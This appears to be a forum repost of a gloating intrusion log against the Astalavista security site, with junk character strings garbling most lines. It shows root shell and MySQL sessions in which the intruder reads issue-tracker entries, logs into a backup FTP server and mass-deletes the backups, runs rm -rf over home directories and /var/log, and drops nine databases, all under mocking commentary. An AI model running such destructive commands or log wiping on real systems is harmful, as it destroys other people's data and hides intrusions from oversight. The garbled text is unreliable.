// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…/ h2 V) p0 P. x! v: M
6 i9 Z$ n  X, M$ W
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;7 i6 w- l% ?! {; f
+——————+———————————————————————————————+
2 [( s* i4 P7 m; i) || iss_summary      | iss_description                                                                             |  a- h0 G3 D! L; t1 z
+——————+———————————————————————————————+; Y. C+ V5 v( ^: I$ M2 D; x0 _0 N: i
| Website guidance | Virtual Girl which guides you trought the website.6 E$ Z! v& a5 r. C; ?/ u* c- e6 o
* B, }: Y( o- G8 p7 {! ^
We need a girl with who you can ( talk )!!!/ o7 W9 V1 y& Y. h" l4 f! m; N
Also for the News!
1 D, m& b8 Q) n- ?8 x4 RSo my suggestion is a girl who read you the news loud if you like!
' q: X9 [3 |: g) A5 T$ [you can choose between read yourselfe or she read it for you or both!
" {" g+ C$ a" e, C" m& ^3 K2 J" L
9 G; ^- X" x& A+ t8 @  I3 B! |+ VGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
4 a. e" T. S8 u" H
: k6 x( X) B: e2 ?" BHave a look on the example girls!!3 N# n& `/ L$ }6 Q/ W8 V. D1 R

2 P4 T6 b) _/ U( s链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
$ L4 S/ E. x# p4 p7 p6 ?3 l9 j" ?% U) i9 j
or that
* e+ u( v- K, _2 g3 f/ M. c+ C
6 m: K- g' r+ o5 a链接标记[url]http://www.yellostrom.de/[/url]
9 U; s5 c  o. S- f2 j- y! p) W( M* u  q
|1 U" |" I3 Q5 E$ s
+——————+———————————————————————————————+" G( Q" W% j3 a3 B
1 row in set (0.00 sec)8 {4 f. ]# q' A; H

0 D9 h) k. }5 T, k2 E" h2 N) n// ha ha.7 p8 x& i" p0 S3 @7 E* M# i" L

7 P4 F: u+ i( r% P, F9 Tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
) o" G4 x' i9 K" q. H+————————–+———————————————————————————————————–+
3 K7 c# |8 o# j" Z" l( u9 S+ M| iss_summary              | iss_description                                                                                           |
# L) f# Y+ g$ A1 T3 K0 z9 v  A4 R+————————–+———————————————————————————————————–+, i& f5 {. K) O# b  B# n
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
6 `: S: s, m+ O, x+————————–+———————————————————————————————————–+
+ g+ Z, r2 T; g6 l# W$ w' m1 row in set (0.00 sec)% K( \! \) a0 j; W
* \0 h7 c( l% ?* K# G8 _: a" X$ X
// LOL.
. K( v8 \4 Z/ w( m$ b+ Z2 ?) O/ h$ w; ?2 t
mysql> exit( b& C3 E& Y2 x' Z+ x
Bye' c# k% ~& u5 n# c
$ V/ f* V% N' x% V8 |
sh-3.2# ftp 212.254.194.163, j- Y1 M- G6 Q$ f( R
Connected to 212.254.194.163.7 V6 [1 i  v) h2 }% e
220 BackupCOM_VW FTP server ready." K& t1 B  P# J8 T0 e
504 AUTH: security mechanism ‘GSSAPI’ not supported.2 L  j. E4 E) z) W- f
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.% H' R( ]* v9 }6 h+ V# p0 b" A
KERBEROS_V4 rejected as an authentication type
' O; D0 {# o' s! i4 g  ?6 s8 [Name (212.254.194.163:root): astalavista.com* t. y  l* Z* {) ]: E
331 Password required for astalavista.com.
2 e  E% N3 D$ WPassword:7 S" F6 Q5 T+ D* T  V
230 User astalavista.com logged in.
# o$ r, ]- m4 |. D) v+ VRemote system type is UNIX.! {6 j% d; I  K; i
Using binary mode to transfer files.: a5 A" M2 N2 F3 N/ V% T
ftp> ls -la
9 L% L6 F: m1 E0 r( ~2 E227 Entering Passive Mode (212,254,194,163,2,188)9 r) j$ E: t6 z" [9 |
150 Opening BINARY mode data connection for ‘file list’.) ^0 u& @; T$ \0 v/ J( u7 [6 n
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com: J/ [- ]* m3 I( i7 u/ @+ C1 H
226 Transfer complete.
3 S$ K% G4 c$ @ftp> cd astalavista.com
9 r" L2 u$ |* A' @' K+ ^250 CWD command successful.5 J& X2 e5 N3 }! o2 r5 J# P& U
ftp> ls -la
% I. _) O4 s, O4 n: Q7 r; ~% {% j  T227 Entering Passive Mode (212,254,194,163,2,189): |. W3 ^" f- ?6 F( u% s
150 Opening BINARY mode data connection for ‘file list’.% d- ~4 g: K* x1 t6 v- N& L
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar9 e( g. p- m5 \
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2! H, E# {/ }0 L7 r1 o; z8 D% _" x/ i
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
; |2 Q9 K2 k6 X7 B-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
2 B2 d0 A# N& y  C- x# C7 A  h: Y-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar8 [; s2 N6 k/ R" E- x1 n5 `* _
[snip]) @1 ]* u# l5 a2 z7 B
226 Transfer complete.
! M4 Z4 M, c* o* Nftp> mdelete *
9 a  N* U% x2 ?ftp> ls -la$ @, L2 C+ X9 m0 z7 r
227 Entering Passive Mode (212,254,194,163,2,193)
+ g2 Z) {5 m+ \; f* e150 Opening BINARY mode data connection for ‘file list’.
  _) d+ l3 S0 g! ]# p! _; }' e226 Transfer complete.
/ o9 [$ V* {0 S  l! Gftp>
8 f1 q/ A7 [% M* z4 u8 o! N, s
( X' c2 a/ N0 N' H1 |) _& @sh-3.2# cd /home8 e' h! J  `9 d% ^
sh-3.2# ls -la
" O4 T% |5 p* ~8 u3 o' {2 Q: Rtotal 120
1 c* G; n* }1 R. ^) adrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
7 d. j. i2 ]) p. i4 [7 Udrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
# `3 Q$ s) r& z% J  rdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
9 y' m! ^2 i' b5 l-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group* ?  s0 K9 C4 t& l% ~, D
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
: H% I/ d+ I( {( p: vdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet% _, X4 ]9 p" E5 J( X! C
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup7 n" N# W( d/ z6 h+ s$ N
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161* d" S5 D( ]2 I8 n, `6 C$ W9 f
drwx–x–x 10 com     com      4096 Apr 28 12:40 com3 l1 [' i6 [( S! d) @9 Q
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
& _1 [% a9 _. v$ N" c$ ]$ `drwx——  3 jon     jon      4096 Sep 21  2007 jon& y+ q2 a0 _! h+ l: k1 I
drwx——  2 root    root    16384 Sep 11  2007 lost+found
& {& _8 |' G" v4 _drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
; k! ]0 u8 l" Edrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
+ P: _. A4 e9 c/ K& l, u% {( v. L5 Adrwx——  2 jon     jon      4096 Sep 15  2007 test
4 g6 I0 G7 P5 }7 Vdrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
( ~7 Q# N1 ~9 c9 m/ y3 \' o5 w( s( ?6 U  L
sh-3.2# rm -rf backup/
7 a$ W8 c3 g8 T. Q7 w2 f  h, f0 R9 Msh-3.2# rm -rf backup.14161/; i8 E2 k. p( G& P+ Q1 J/ b
sh-3.2# rm -rf ftp/* \* C+ {  q' }8 t, X3 I
sh-3.2# rm -rf jon/: k2 i& X, _/ a
sh-3.2# rm -rf my/4 A3 D9 p$ O$ L
sh-3.2# rm -rf mysqldata/
: a  U) u1 D! u* u$ ~0 rsh-3.2# rm -rf test/, u, b) }  f( f* `
sh-3.2# rm -rf tmp/8 l9 t9 P4 k9 Y3 b2 T% ]1 ~
sh-3.2# cd ~. x; A8 d9 F' o3 R, k6 Q8 a9 @
sh-3.2# rm -rf *
# w' C1 W: W1 ash-3.2# rm -rf /var/log/8 W+ i& B$ |% T% X9 H! c$ b! g4 v
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
* X. k" g1 x2 V) [; @sh-3.2# rm -rf /home/*
2 C1 T' h% L# [) `! C: gsh-3.2# mysql
- ]3 N7 R0 Q( y0 H* u! {5 UWelcome to the MySQL monitor.  Commands end with ; or \g.
- o+ S; ]( Z) d+ |' ?6 f4 z+ _Your MySQL connection id is 407156
8 u7 w( @! C4 }% `2 Y8 qServer version: 5.0.45-community-log MySQL Community Edition (GPL)5 _& I: P( ]* L. W2 N
3 ^0 _1 A# u1 K+ {7 S
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) \' A# g: h6 U4 u( a
$ e3 ~4 `3 M7 p/ `9 m2 Amysql> show databases;0 @, @7 N" e) `* b' H4 v# J3 ~
+———————–+
' f" \$ K0 t, {, q2 h" R% k| Database              |
; R! G, q/ ^9 W$ W) m1 s5 ^+———————–+- G  h1 A+ W( d7 \, |$ C5 _
| information_schema    |
, ]. w, `" }7 ]7 _' r3 ~| astanet_ads           |$ s3 Q9 K! ]4 s; p8 R( d
| astanet_mailing_lists |
, f2 @" }" m! {0 J5 y6 k! A. g) Z, D| astanet_mediawiki     |# A+ B2 J7 i* j* ~; j% l
| astanet_membersystem  |. {9 a6 D4 r/ e) j7 n
| com_contrexx          |5 \+ D2 w& K$ A$ @
| com_contrexx2         |: c, I8 b" {& X8 h
| com_contrexx2_live    |
3 x9 v  u  ^, B/ K8 J| da_roundcube          |
% P! i( P' `) W' W+ R( k| dolphin               |
, K$ {" L7 ]% s* J) v- v# F. }| ideapool              |$ s0 ^7 g- d7 W4 k
| mysql                 |$ i/ D  D4 `  m, _) O4 c% A
| test                  |: ^% v! d( x/ @! F" t) e# c0 z8 S. K" n
| yourmaster            |- H2 l! ]3 q, Z% z0 S% u  d) c
+———————–+* i. l" y6 h9 @2 k6 L: o# Q8 Z
14 rows in set (0.03 sec)& d/ p" I  Y! W% c( O
$ _# s1 ^3 J6 s
mysql> drop database astanet_membersystem;
0 H" `* N- L+ U2 J- u- d5 T# ydroQuery OK, 46 rows affected (0.81 sec)6 D. t3 f+ s1 {  ~

' q: m. |: V6 U' }) S4 \mysql> drop database com_contrexx;7 C8 n8 u* ?5 @1 d# @( {+ \
Query OK, 211 rows affected (2.72 sec)
7 ?8 v9 u5 Q! T8 ]! U" t! {' M, W2 U. v7 r1 @2 `9 f4 R
mysql> drop database com_contrexx2;: g6 H( ~+ A, u# \; R
Query OK, 237 rows affected (2.23 sec)8 b7 p% j: v8 _5 J# |8 n! p

) t) Y0 w! u% l* ymysql> drop database com_contrexx2_live;
. Q+ G- @7 j3 ?- a& [Query OK, 227 rows affected (7.63 sec)$ G8 x2 u% k& f9 _

9 P2 Z* ~8 [+ E( O8 Tmysql> drop database ideapool;# \( T( L; W5 S
Query OK, 69 rows affected (0.19 sec)
* K1 o, F1 h5 m/ O7 b' W
; _8 z' P+ E0 {) R& E' g- Rmysql> drop database yourmaster;- e6 |. h; F% d. C; g0 z2 l
Query OK, 158 rows affected (0.55 sec)
3 I- z/ r  }* G0 O3 i& l' \$ D  r. @- W: p& R; r: H  \
mysql> drop database astanet_ads;
5 ]. M- p  g9 I: o% K* g4 @Query OK, 9 rows affected (0.11 sec)
9 k6 Z2 ~3 {0 Y$ N% c* Z4 I8 k! J
+ ^" s+ B1 K! `8 ?+ _6 c7 `: C5 S( Emysql> drop database astanet_mailing_lists;7 [; v! ^9 f  X; E/ j2 U" u" r
Query OK, 24 rows affected (1.47 sec)3 |5 f. Q" J! e- r8 A/ O2 _

" ^/ O5 X- L8 j2 T& Hmysql> drop database astanet_mediawiki;# _% e$ _8 r$ f: f. z
Query OK, 31 rows affected (0.51 sec)+ ~6 b+ A$ M& @5 u; Z

3 v  A& V2 f! y* Imysql> show databases;) k5 U7 E3 M' P
+——————–+
) Y9 v' S- J! y& J| Database           |- j$ M: f2 |: V% N) S, N- n
+——————–+
8 L: f! D3 e; T! f; F* S# u| information_schema |
* E4 n+ a2 K! q6 ^' f) N8 A) M| da_roundcube       |
* j. V0 |8 ?+ w% C| dolphin            |* A3 v8 C# V- Y% z5 x
| mysql              |# |; z! I1 g) P7 H) Y
| test               |
  Z9 A  s, g5 \5 z+——————–+
( L! q* B/ a) a% Q2 T  `9 S5 rows in set (0.00 sec)
7 {* U: Q5 ]& G, {& U0 e0 A9 N2 L/ _! ?! D7 M: o' ]
What a journey! We’re not sure exactly why the “Terminator” had any influence on
. J) U, V+ e  w. z: U# B/ E. Itheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the8 i4 J, M7 f! v, F
wrong to say this pack of morons *wont be back*.5 u4 t0 }! H$ V





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2